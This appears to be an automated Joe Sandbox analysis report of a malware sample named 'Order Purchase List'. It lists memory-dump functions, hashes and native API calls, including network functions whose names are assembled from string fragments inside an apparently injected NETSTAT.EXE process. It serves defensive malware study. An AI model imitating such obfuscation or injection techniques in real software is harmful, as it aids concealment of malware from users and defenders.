Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6260832c20befb554ee63aabac620c59c5f03286517c4aaf3fbd916f67317ff
Instruction ID: 30a90647132be9fa7f3c5124488fac858ce60e329e10de007bea9b208d39e9f1
Opcode Fuzzy Hash: c6260832c20befb554ee63aabac620c59c5f03286517c4aaf3fbd916f67317ff
Instruction Fuzzy Hash: 18B09B63E610441549245D8574450B5F365D797137F4132E6EE0CE34006906946349DD

Uniqueness

Uniqueness Score: -1.00%

Function 00415852, Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00415852(void* __eax, void* __edx) {

				asm("cld");
				asm("sbb al, 0x7c");
				return __eax;
			}

0x00415853
0x00415854
0x0041585f

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c22b02bdc5548bbd68fd2fa2066c37c4dc2de67460857279b9c2ce96134e1b
Instruction ID: a5532c49f01742ea4cc80d405c60fa1799a97be4c2a32a1ff3407ef2c3192bc2
Opcode Fuzzy Hash: f4c22b02bdc5548bbd68fd2fa2066c37c4dc2de67460857279b9c2ce96134e1b
Instruction Fuzzy Hash: DEA0012BE99028049A5498BAB8800B5D324E2EB6BA83076A3E68AB78010216C41F416D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NETSTAT.EXE PID: 4856 Parent PID: 3352 NETSTAT.EXECOMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	738
Total number of Limit Nodes:	84

Executed Functions

Function 02B085EA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02B03BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B03BC7,007A002E,00000000,00000060,00000000,00000000), ref: 02B0863D

Strings

.z`, xrefs: 02B0862D, 02B08638

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 720263ed59fa02244873766f6b84439581edb3dfc0b81a24a8d92efbd1814e4f
Instruction ID: b48288c70478eab835cedec12d2f98306aa85e5382a7b40aa5862e72207f5b18
Opcode Fuzzy Hash: 720263ed59fa02244873766f6b84439581edb3dfc0b81a24a8d92efbd1814e4f
Instruction Fuzzy Hash: 140199B2215208AFCB08CF88DC94EEB37A9BF8C754F158248BA1D97251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B085F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02B03BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B03BC7,007A002E,00000000,00000060,00000000,00000000), ref: 02B0863D

Strings

.z`, xrefs: 02B0862D, 02B08638

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 9ca9ac57e1e0fc519c8630f4b2c1d099bb37ffaece14d7d4bfc4f120f99816f7
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: ADF0BDB2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97241C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B086A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02B03D82,5E972F65,FFFFFFFF,02B03A41,?,?,02B03D82,?,02B03A41,FFFFFFFF,5E972F65,02B03D82,?,00000000), ref: 02B086E5

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 0c1b214cb5f3f92949eb4afd524637f740b2e9575edc343bbafafd8e1e6632e5
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: CEF0A4B2200208ABCB14DF89DC94EEB77ADAF8C754F158248BE1D97241D630EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B087D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02AF2D11,00002000,00003000,00000004), ref: 02B08809

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: bd37354b2fa8a781cf2ea37c0846d428a54cf4899a00b7ac28b3f058dce6fa1b
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 7DF015B2200208ABCB14DF89CC80EAB77ADAF8C750F118148BE0897242C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B087CA, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02AF2D11,00002000,00003000,00000004), ref: 02B08809

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c761702b1276291f378199c8ec4c4d5e8de6316a7b99ab1342ef7e9bd1673fa4
Instruction ID: 56f3e68eccd46ad2fd7cd79b883b3dc54847a89594677b405a04e7d1f4ae5231
Opcode Fuzzy Hash: c761702b1276291f378199c8ec4c4d5e8de6316a7b99ab1342ef7e9bd1673fa4
Instruction Fuzzy Hash: 19F0F2B6200218ABCB18DF88DC84EAB77ADAF8C750F158158FE1897242C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B0871A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02B03D60,?,?,02B03D60,00000000,FFFFFFFF), ref: 02B08745

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 552f8c6e0b005e0937a3167aa44eac71cb19e429f7afd3d2d6a54cf0dbc4e2fb
Instruction ID: 96c578306078df909ff35a29301fcd11c7cc73d2afd805f80733626a4ce3fbec
Opcode Fuzzy Hash: 552f8c6e0b005e0937a3167aa44eac71cb19e429f7afd3d2d6a54cf0dbc4e2fb
Instruction Fuzzy Hash: 44E08C71200510BBD710DFA88C89FE77B29EF88620F044198BA189B242C631E91086D0

Uniqueness

Uniqueness Score: -1.00%

Function 02B08720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02B03D60,?,?,02B03D60,00000000,FFFFFFFF), ref: 02B08745

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 88cc3f72ad21b763f804833de3e9b59eb927b877047885b82529e26e15a8c805
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: ADD012752002147BD710EB98CC85E977B5DEF48750F154495BA185B242C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA9A5A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1366f0aee8ff7021c2be630f7f9de83ecbbe532ad9de99d3df62d90b5704ccc3
Instruction ID: 916a27b3cea06688ad3d0c1bb26556ec6153fe87bf2d0db7e8ab4219e107807e
Opcode Fuzzy Hash: 1366f0aee8ff7021c2be630f7f9de83ecbbe532ad9de99d3df62d90b5704ccc3
Instruction Fuzzy Hash: 8790026135180043D24165695C15B870009DBD0343F51D125A0144554CC9559861A961

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA986A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8d041ed6367203926c7ba366b0c22ea0082900ba74c2b88f34ed304c79fabd6
Instruction ID: 14ae5e9f8d97b3f837510c874d321e94ebc3934e7ad87ac8fce3f6922c2af8f8
Opcode Fuzzy Hash: c8d041ed6367203926c7ba366b0c22ea0082900ba74c2b88f34ed304c79fabd6
Instruction Fuzzy Hash: 2490027134100413D15261595905787000DDBD0282F91D422A0414558DD6969952F561

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA984A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b4afc0461439446211f25222ecdca5f51fb9549f1ca31d587bfa522077ebc00
Instruction ID: 8d5edd9fccc6cf517e7bdd4ab62ed4d955e7007a5e7341e8e6334966037cd015
Opcode Fuzzy Hash: 2b4afc0461439446211f25222ecdca5f51fb9549f1ca31d587bfa522077ebc00
Instruction Fuzzy Hash: 1A900261382041535586B1595805587400AEBE0282791D022A1404950CC566A856EA61

Uniqueness

Uniqueness Score: -1.00%

Function 02EA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA99AA

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36e88bcdb36ccd14d7a516387dc3303a69be4726e56a41681a700da8eccd988a
Instruction ID: 4b7f88db6e0686d0e27d228a9ad73ee9dee6ad2f4d221c29b5754626dce4c01a
Opcode Fuzzy Hash: 36e88bcdb36ccd14d7a516387dc3303a69be4726e56a41681a700da8eccd988a
Instruction Fuzzy Hash: 599002A138100443D14161595815B870009DBE1342F51D025E1054554DC659DC52B566

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA991A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fae320745db5253ba8ebea5f7ce6d2d8c65bd9119d42b31288078e8a8c149b7d
Instruction ID: fd7136d2799a56463fc2a00a7d448a6900ab86af035e8aa099a1ec497849337b
Opcode Fuzzy Hash: fae320745db5253ba8ebea5f7ce6d2d8c65bd9119d42b31288078e8a8c149b7d
Instruction Fuzzy Hash: 8B9002B134100403D181715958057C70009DBD0342F51D021A5054554EC6999DD5BAA5

Uniqueness

Uniqueness Score: -1.00%

Function 02EA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA96EA

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a81a2e97851ec224765e0cc3d4a099d466c6423528c0f6f708f5c8b3d2ce456
Instruction ID: 9c2ce07049d617255f1bdc1329eb890ddba09a15d06c98dfe42fc0c070127ee8
Opcode Fuzzy Hash: 5a81a2e97851ec224765e0cc3d4a099d466c6423528c0f6f708f5c8b3d2ce456
Instruction Fuzzy Hash: A690027134108803D151615998057CB0009DBD0342F55D421A4414658DC6D59891B561

Uniqueness

Uniqueness Score: -1.00%

Function 02EA96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA96DA

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5dfc8621eede3e04f6496ce62de0211285b02509f0c1f8617c166190c2a68ec
Instruction ID: 4b0be6346786ea87d696e47662a3c44f798352b02bc521dc4a900b0427b53563
Opcode Fuzzy Hash: f5dfc8621eede3e04f6496ce62de0211285b02509f0c1f8617c166190c2a68ec
Instruction Fuzzy Hash: 9990027134100843D14161595805BC70009DBE0342F51D026A0114654DC655D851B961

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA966A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e1c0f5943538a60dfadbd798e515814ae371fbaa47ea61475f86312796461dc
Instruction ID: f43a4d610f8acd4a746f6ec64ebc0f00bab67073b94e9575a077cbe3244be6b1
Opcode Fuzzy Hash: 4e1c0f5943538a60dfadbd798e515814ae371fbaa47ea61475f86312796461dc
Instruction Fuzzy Hash: A790027134100803D1C1715958056CB0009DBD1342F91D025A0015654DCA559A59BBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA965A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5124f7c8aac7ed0083c74281e6cb12b0a0863cf9618c3d1dacd4b64af8f19f38
Instruction ID: 1dfad89af4666fb47de61f7b8f9a4b956c1e010afcc9e01f07e32de15b749631
Opcode Fuzzy Hash: 5124f7c8aac7ed0083c74281e6cb12b0a0863cf9618c3d1dacd4b64af8f19f38
Instruction Fuzzy Hash: 3090027134504843D18171595805AC70019DBD0346F51D021A0054694DD6659D55FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA9FEA

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c038386db63bc537dabcba6fbc6b106408c77720cefc237346f0481f20a6b82b
Instruction ID: 4032c4ba0e7cbb5892dd97bd01c3b06bdf4e671a0858eb5b60b93b39e34755d9
Opcode Fuzzy Hash: c038386db63bc537dabcba6fbc6b106408c77720cefc237346f0481f20a6b82b
Instruction Fuzzy Hash: F490027135114403D151615998057870009DBD1242F51D421A0814558DC6D59891B562

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA978A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c832552842cdbf0c5391ab571dede4864c377f876e88cf5512128fd70ca99d9
Instruction ID: 67ef712f174ffbe986c039c7d8574fe451ced3cea20aa74525bc3724e3b4ec21
Opcode Fuzzy Hash: 9c832552842cdbf0c5391ab571dede4864c377f876e88cf5512128fd70ca99d9
Instruction Fuzzy Hash: 1190026935300003D1C17159680968B0009DBD1243F91E425A0005558CC9559869A761

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA971A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e194c4b9c348fa6f3d8bb9964b2e1f243d451520b31d26de3c3276bd50dd6439
Instruction ID: ca98ba837b0e3cb91802a094603df555c9a09410f515eb583fbdc86815983e36
Opcode Fuzzy Hash: e194c4b9c348fa6f3d8bb9964b2e1f243d451520b31d26de3c3276bd50dd6439
Instruction Fuzzy Hash: 1E90027134100403D141659968096C70009DBE0342F51E021A5014555EC6A59891B571

Uniqueness

Uniqueness Score: -1.00%

Function 02EA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA95DA

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 186a2178f5640225130397d367d4e489ec598376ff61d4ca669ea7e5b2ea1c78
Instruction ID: 15f12c771d2b05b61ee4f3c2e68e798d76403b45c5895f8f7a39fd8b5213c65c
Opcode Fuzzy Hash: 186a2178f5640225130397d367d4e489ec598376ff61d4ca669ea7e5b2ea1c78
Instruction Fuzzy Hash: 809002A134200003414671595815697400EDBE0242B51D031E1004590DC5659891B565

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA954A

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4daaa36457e80a162f9a1184ec32f117cc81c47a2efd85de67b4625806cf9fe
Instruction ID: f28fc6596e1d7c86ee56284b3b809967acd0809d7d3ee08c7a9c4bdd4640f5e3
Opcode Fuzzy Hash: d4daaa36457e80a162f9a1184ec32f117cc81c47a2efd85de67b4625806cf9fe
Instruction Fuzzy Hash: 51900265351000030146A5591B05587004ADBD5392351D031F1005550CD6619861A561

Uniqueness

Uniqueness Score: -1.00%

Function 02B08C75, Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 63
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02B08C67

Strings

Inte, xrefs: 02B08C9A
Conn, xrefs: 02B08CA8
rnetOpenA, xrefs: 02B08C61, 02B08C66
ConnectA, xrefs: 02B08CE2, 02B08CE7
ectA, xrefs: 02B08CAF
rnetConnectA, xrefs: 02B08CDE, 02B08CE6
InternetOpenA, xrefs: 02B08C5D, 02B08C65
Open, xrefs: 02B08C38
InternetConnectA, xrefs: 02B08CDA, 02B08CE5
rnet, xrefs: 02B08CA1
rnet, xrefs: 02B08C31
A, xrefs: 02B08C3F

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Conn$ConnectA$Inte$InternetConnectA$InternetOpenA$Open$ectA$rnet$rnet$rnetConnectA$rnetOpenA
API String ID: 2038078732-965392731
Opcode ID: 12eb9aab3057f228f76ced02394d0620cba35320fbead37830c3b3f3f57423d4
Instruction ID: 35d75dadacf08e2096f333ddd6f0392573a7bff1a066b85af13087aa5587fc36
Opcode Fuzzy Hash: 12eb9aab3057f228f76ced02394d0620cba35320fbead37830c3b3f3f57423d4
Instruction Fuzzy Hash: 6311FEB2916159AFCB15DF88D8809AE7BB9EF48710F148189BD48A7341D7359E108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B08D00, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02B08D68

Strings

Open, xrefs: 02B08D21
Http, xrefs: 02B08D1A
estA, xrefs: 02B08D2F
OpenRequestA, xrefs: 02B08D5E, 02B08D66
Requ, xrefs: 02B08D28
HttpOpenRequestA, xrefs: 02B08D5A, 02B08D65
RequestA, xrefs: 02B08D62, 02B08D67
HttpOpenRequestA, xrefs: 02B08D0D, 02B08D10

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
Instruction ID: f10b68b64c4f053144bed6332081cf9f88d99bef48eb995527163d8ae6841b3d
Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
Instruction Fuzzy Hash: B301E9B2905119AFCB14DF98D881DEF7BB9EB88610F158289FD48A7245D631EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B08CF6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 47
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02B08D68

Strings

Open, xrefs: 02B08D21
Http, xrefs: 02B08D1A
estA, xrefs: 02B08D2F
OpenRequestA, xrefs: 02B08D5E, 02B08D66
Requ, xrefs: 02B08D28
HttpOpenRequestA, xrefs: 02B08D5A, 02B08D65
RequestA, xrefs: 02B08D62, 02B08D67
HttpOpenRequestA, xrefs: 02B08D0D, 02B08D10

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 16879a72a5cad4ddb45195edaf6717372d8adb4b67363750158e4ccc044c11f3
Instruction ID: 42527930f37e6c0e40a4adf3e4d4cb8e35119c8091ca890dec941bf3470fda01
Opcode Fuzzy Hash: 16879a72a5cad4ddb45195edaf6717372d8adb4b67363750158e4ccc044c11f3
Instruction Fuzzy Hash: 6B0129B2505159AFCB04DF88D981DEF7BB9EF48650F158288FD48A7205C631EE10CBA1

Uniqueness

Uniqueness Score: -1.00%

